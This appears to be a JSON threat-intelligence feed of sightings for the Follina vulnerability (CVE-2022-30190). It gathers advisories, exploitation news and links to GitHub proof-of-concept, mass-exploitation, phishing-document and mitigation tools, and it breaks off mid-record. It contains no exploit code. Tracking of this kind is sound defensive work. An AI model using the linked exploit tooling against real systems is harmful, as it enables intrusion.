{"vulnerability": "cve-2022-30190", "sightings": [{"uuid": "910fefac-0270-4967-b84a-77a8f1858ccd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/b7effe8d-f245-44fd-94ef-5f2f693cfb06", "content": "", "creation_timestamp": "2022-09-30T08:50:28.000000Z"}, {"uuid": "75760ae9-9019-4d3f-ab6d-99f2a7d38538", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/c8255e2a-36b1-4d59-805a-aeb73aa8e929", "content": "", "creation_timestamp": "2022-06-21T18:38:00.000000Z"}, {"uuid": "35b78d10-3136-419d-91fd-41142c2125ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3410ad13-ef34-48c9-bc6f-b1b111a30e06", "content": "", "creation_timestamp": "2022-06-23T13:12:55.000000Z"}, {"uuid": "a0a2cf86-7566-40b6-9083-8ae8456f113c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/99138053-ae5d-4bcf-b2f8-0954edb204bc", "content": "", "creation_timestamp": "2022-11-01T20:54:34.000000Z"}, {"uuid": "6a32a493-934b-4714-96cf-b465b946c6b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2023-06-14T21:10:04.000000Z"}, {"uuid": "d1293f12-e28c-439d-ab8d-86b033275394", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", 
"source": "MISP/e7824ab3-14c8-4fc3-ada2-930b0487144c", "content": "", "creation_timestamp": "2022-06-21T06:36:06.000000Z"}, {"uuid": "22ae57ed-180a-4e4a-8366-690e3eec2413", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://msrc.microsoft.com/blog/2022/05/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/", "content": "", "creation_timestamp": "2022-05-30T05:00:00.000000Z"}, {"uuid": "5545302c-24ca-462d-a85f-1aa82f714bdc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/a67c65c39634310289635ecf99dea9a6", "content": "", "creation_timestamp": "2025-01-07T11:17:15.000000Z"}, {"uuid": "54cf600f-a2ec-44bf-bcf5-771251e358ac", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://feedsin.space/feed/CISAKevBot/items/2971663", "content": "", "creation_timestamp": "2024-12-24T20:32:30.507284Z"}, {"uuid": "ef5800b2-3d92-4ce1-b83d-dcad2c07ec0b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/3a597fc9e98398f18b8f135687964a65", "content": "", "creation_timestamp": "2025-02-07T07:21:16.000000Z"}, {"uuid": "60b8af5e-ee6f-449c-88bf-00eddada910c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-06T03:13:45.000000Z"}, {"uuid": 
"7af661e6-b399-44a9-beb0-93369e25ffa4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/redteamnews.bsky.social/post/3ll3dsf4wsv24", "content": "", "creation_timestamp": "2025-03-23T22:59:31.372080Z"}, {"uuid": "ce9eed15-48a5-4001-bd35-410849a6769b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/c8255e2a-36b1-4d59-805a-aeb73aa8e929", "content": "", "creation_timestamp": "2025-04-11T08:52:00.000000Z"}, {"uuid": "ca6f3b44-1a0e-41b3-9e5f-747256d94b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/hackingne.ws/post/3lleoqhxjgv2l", "content": "", "creation_timestamp": "2025-03-27T16:09:15.956404Z"}, {"uuid": "cab41f2f-ce32-4dfe-9850-7eb20122850e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/3c19819c-1dac-4ef2-bfed-be5efa7e0123", "content": "", "creation_timestamp": "2025-02-23T02:10:37.000000Z"}, {"uuid": "a250de35-b8e0-4cf0-b69d-e1437c8ad258", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/a1e796df-2ad8-4c8d-8b69-737a004e72dd", "content": "", "creation_timestamp": "2025-02-23T04:10:46.000000Z"}, {"uuid": "6f168bc1-30ed-4dfa-8519-5cb739eb4f86", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": 
"https://poliverso.org/objects/0477a01e-5160f4b6-f5bea135b10e56d0", "content": "", "creation_timestamp": "2025-06-11T13:05:26.587857Z"}, {"uuid": "d73f967d-a96e-4668-9b5e-6b38ff39f5d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/1f469f99675752c7ae1749a43429185d", "content": "", "creation_timestamp": "2025-04-27T13:33:59.000000Z"}, {"uuid": "cd1dc2eb-2db9-4275-971b-274cf7e9900f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/jos1264.social.skynetcloud.site.ap.brid.gy/post/3luo32nqinkl2", "content": "", "creation_timestamp": "2025-07-23T22:30:32.549661Z"}, {"uuid": "9e131209-76ee-43a8-8b1f-558691318df1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/356b6be98f75b1f7f00096fb3de09f7d", "content": "", "creation_timestamp": "2025-07-01T16:33:57.000000Z"}, {"uuid": "6993d5d8-8eeb-4aa1-b568-0db847976627", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/word_msdtjs_rce.rb", "content": "", "creation_timestamp": "2022-06-06T20:02:58.000000Z"}, {"uuid": "70b2a4c6-a351-404e-99ac-a555611cdbca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/ab0b745f-bbd5-338e-8b92-97dd0c757e9d", "content": "", "creation_timestamp": 
"2025-08-31T03:01:00.000000Z"}, {"uuid": "9d218953-990b-4ee2-b83e-c5e65c89f4e4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/7c1fa1521d76b91a66875cf22cc1dbf2", "content": "", "creation_timestamp": "2025-12-01T07:56:27.000000Z"}, {"uuid": "27803992-4c70-43e9-9ca0-9562f7930e1f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/19e3f897ebc190a0d9fba1ddb254e07f", "content": "", "creation_timestamp": "2025-08-01T15:12:03.000000Z"}, {"uuid": "14d645c4-33bb-4fd4-9d86-3da7d09a4334", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/ef4f79882a9a998824e5edb9a9c39d9f", "content": "", "creation_timestamp": "2025-10-31T22:18:16.000000Z"}, {"uuid": "e1d146b4-84ea-40f3-b6ec-7dbd68ee66ae", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "cve-2022-30190", "type": "seen", "source": "https://www.cert.at/de/warnungen/2022/5/remote-code-execution-schwachstelle-in-microsoft-windows-workarounds-verfugbar", "content": "", "creation_timestamp": "2022-05-31T13:31:13.000000Z"}, {"uuid": "74158ae8-b8f1-48e3-944b-210cd22dba18", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/244584afa823b7a82f1fc04b52872393", "content": "", "creation_timestamp": "2025-10-01T19:45:44.000000Z"}, {"uuid": "443a3e46-fc7c-456a-819f-f0bc5b237d78", 
"vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://sploitus.com/exploit?id=11EF8E6B-7CBD-5758-94E1-220BF0F529A7", "content": "", "creation_timestamp": "2025-10-18T09:43:12.000000Z"}, {"uuid": "edbd850f-ae8e-4cc0-9010-3cf4db43d7ad", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://bsky.app/profile/pigondrugs.bsky.social/post/3mgfs726gpy2b", "content": "", "creation_timestamp": "2026-03-06T17:03:59.589984Z"}, {"uuid": "42bc957c-ef3d-4c85-86f0-c71a3212cf79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/09dc4628be4c6acef1445113651a4bbd", "content": "", "creation_timestamp": "2025-09-01T15:01:42.000000Z"}, {"uuid": "1b051cc6-0648-43bf-9ac4-2ab83779ca0d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/f0ea883416140b0333e5b1d33f3751c8", "content": "", "creation_timestamp": "2026-02-02T12:06:45.000000Z"}, {"uuid": "b65f93c7-1058-433a-bbf0-30d2d2d97881", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/ca50029f36cfd4b84b9f9e5785d4a904", "content": "", "creation_timestamp": "2026-03-04T12:43:32.000000Z"}, {"uuid": "0d42ede6-b532-47c1-8ff8-972f4ce71d41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": 
"CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/7956a2cb84c64f8278087c33a21a2617", "content": "", "creation_timestamp": "2026-01-03T10:10:27.000000Z"}, {"uuid": "96913d0b-6db9-4a0e-9d29-b289801b136a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=813", "content": "", "creation_timestamp": "2022-05-31T04:00:00.000000Z"}, {"uuid": "87d0fc62-7795-4ec7-ad01-93aa7f43051a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.kyberturvallisuuskeskus.fi/fi/haavoittuvuus_10/2022", "content": "", "creation_timestamp": "2022-05-31T08:23:44.000000Z"}, {"uuid": "a5cb34a6-b197-4c4b-b7ab-4a2cd772b3f7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://vulnerability.circl.lu/bundle/fdda4963-0aa7-4d15-8a8f-969db8f304ca", "content": "", "creation_timestamp": "2025-02-28T23:49:13.272798Z"}, {"uuid": "543d35ac-c3ee-4065-8904-ea4e9200e45d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "86ecb4e1-bb32-44d5-9f39-8a4673af8385", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://www.govcert.gov.hk/en/alerts_detail.php?id=821", "content": "", "creation_timestamp": "2022-06-15T04:00:00.000000Z"}, {"uuid": "6c41a0bc-0594-42d0-9300-c1044f1fb2b1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12319", "content": "Latest news and stories from BleepingComputer.com\nRussian hackers 
start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. [...]", "creation_timestamp": "2022-06-13T18:30:05.000000Z"}, {"uuid": "3eaa0b68-d3ed-4795-9b0e-6114e2c659ea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "af0120d0-3dac-4a6a-974b-a9f33d2a9846", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://vulnerability.circl.lu/known-exploited-vulnerabilities-catalog/a24c34a5-ecd1-4d12-8e98-0503826daa06", "content": "", "creation_timestamp": "2026-02-02T12:27:20.086211Z"}, {"uuid": "36af6b22-081e-475e-b7e5-791b1395406e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2379", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 Zero click rce Mass Exploitation Tool with Multi threading capabilities\nURL\uff1ahttps://github.com/Kesinger57/CVE-2022-30190-mass-rce\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T17:39:40.000000Z"}, {"uuid": "b15b3c84-ce2b-4af3-81ad-58d46b09991e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2372", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMitigates the \"Folina\"-ZeroDay (CVE-2022-30190)\nURL\uff1ahttps://github.com/derco0n/mitigate-folina\n\n\u6807\u7b7e\uff1a#CVE-2022", 
"creation_timestamp": "2022-06-02T09:38:03.000000Z"}, {"uuid": "25fb4c5d-bcb0-47a4-acb8-465cc1184bbe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://gist.github.com/choco-bot/23f2147b9bc46faaa2ed0d46e177aee6", "content": "", "creation_timestamp": "2026-04-03T14:42:52.000000Z"}, {"uuid": "472eb34a-9d79-4ffb-92b9-d79175325469", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BleepingComputer/12317", "content": "Russian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190. 
[...]\n\nhttps://www.bleepingcomputer.com/news/security/russian-hackers-start-targeting-ukraine-with-follina-exploits/", "creation_timestamp": "2022-06-13T18:29:49.000000Z"}, {"uuid": "7a492c1f-3f8a-43e1-933a-b9e426bd5945", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2326", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft Office Word Rce \u590d\u73b0(CVE-2022-30190)\nURL\uff1ahttps://github.com/bytecaps/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-05-31T13:19:45.000000Z"}, {"uuid": "0687f47a-3397-445d-90d9-4368ebcb319e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BleepingComputer/12587", "content": "XFiles info-stealing malware adds support for Follina delivery\n\nThe XFiles info-stealer malware has added a delivery module that exploits CVE-2022-30190, aka Follina, for dropping the payload on target computers. 
[...]\n\nhttps://www.bleepingcomputer.com/news/security/xfiles-info-stealing-malware-adds-support-for-follina-delivery/", "creation_timestamp": "2022-06-30T14:24:55.000000Z"}, {"uuid": "083e8663-9e75-4207-a5a0-05da1b0c1756", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2376", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThe CVE-2022-30190-follina Workarounds Patch\nURL\uff1ahttps://github.com/sentinelblue/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T14:35:29.000000Z"}, {"uuid": "0bd39e81-81e2-4a7a-ab26-37a8e1bbd4e6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2375", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aThe CVE-2022-30190-follina Workarounds Patch\nURL\uff1ahttps://github.com/suegdu/CVE-2022-30190-Follina-Patch\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T14:11:44.000000Z"}, {"uuid": "3a125ccd-3cef-4ae4-adf2-5b3251eecced", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2374", "content": 
"GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190-follina.py-\u4fee\u6539\u7248\uff0c\u53ef\u4ee5\u81ea\u5b9a\u4e49word\u6a21\u677f\uff0c\u65b9\u4fbf\u5b9e\u6218\u4e2d\u9493\u9c7c\u4f7f\u7528\u3002\nURL\uff1ahttps://github.com/komomon/CVE-2022-30190-follina-Office-MSDT-Fixed\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-02T12:46:47.000000Z"}, {"uuid": "c95b73b5-455b-4d97-8a7a-c143b195f464", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2446", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aD\u00e9sactivation du protocole MSDT URL (CVE-2022-30190) avec gestion des erreurs et de l'exit code pour un d\u00e9ploiement en masse\nURL\uff1ahttps://github.com/Rojacur/FollinaPatcherCLI\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-06T16:32:50.000000Z"}, {"uuid": "ecfeaff9-ee26-4832-85f2-5fb3af6fb7e5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2462", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aServer to host/activate Follina payloads & generator of malicious Word documents exploiting the MS-MSDT protocol. (CVE-2022-30190)\nURL\uff1ahttps://github.com/dsibilio/follina-spring\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T22:51:50.000000Z"}, {"uuid": "30f9b6f9-9f8b-43e9-b57d-4571d29d5fa0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2461", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aNotes related to CVE-2022-30190\nURL\uff1ahttps://github.com/abhirules27/Follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-07T21:29:39.000000Z"}, {"uuid": "03f9897c-f933-42dc-8f76-133fbc0a662e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2440", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMicrosoft MS-MSDT Follina (0-day Vulnerability) CVE-2022-30190 PoC\nURL\uff1ahttps://github.com/IamVSM/msdt-follina\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-06T09:16:45.000000Z"}, {"uuid": "68df786d-4558-40ab-9822-a1173422d1c1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2510", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aExtract payload URLs from Follina (CVE-2022-30190) docx and rtf files\nURL\uff1ahttps://github.com/MalwareTech/FollinaExtractor\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-15T02:38:56.000000Z"}, {"uuid": 
"822b980c-c09c-4af8-ae89-0e6885796550", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2599", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aCVE-2022-30190 powerpoint version\nURL\uff1ahttps://github.com/Gra3s/CVE-2022-30190-PowerPoint\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-29T08:55:03.000000Z"}, {"uuid": "34f01424-d37a-4d40-80e9-9ede5e6b6226", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/cKure/9665", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Zero-Day: Exploit code for Microsoft Windows Support Diagnostic Tool RCE.\n\n\nhttps://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190", "creation_timestamp": "2022-06-05T06:52:17.000000Z"}, {"uuid": "fc96a364-bae5-4f9d-ad55-fcbbfd73cec1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/cKure/9750", "content": "\u25a0\u25a0\u25a0\u25a0\u25a1 Follina patch CVE-2022-30190. (msdt.exe) is out.  
\n\nhttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-30190", "creation_timestamp": "2022-06-15T09:39:46.000000Z"}, {"uuid": "0068ef32-c718-4136-90b1-2966da7e7563", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "MISP/5180856b-d3c5-4036-9201-94693724365c", "content": "", "creation_timestamp": "2026-04-19T22:25:34.000000Z"}, {"uuid": "d97ca475-1454-43c9-aa7e-7aa12dcdd889", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/GithubRedTeam/2364", "content": "GitHub\u76d1\u63a7\u6d88\u606f\u63d0\u9192\uff01\uff01\uff01\n\n\u66f4\u65b0\u4e86\uff1aCVE-2022\n\u63cf\u8ff0\uff1aMS-MSDT Follina CVE-2022-30190 PoC document generator\nURL\uff1ahttps://github.com/sudoaza/CVE-2022-30190\n\n\u6807\u7b7e\uff1a#CVE-2022", "creation_timestamp": "2022-06-01T23:34:44.000000Z"}, {"uuid": "96c0da42-43e5-49c0-a889-53c98b2399a0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": 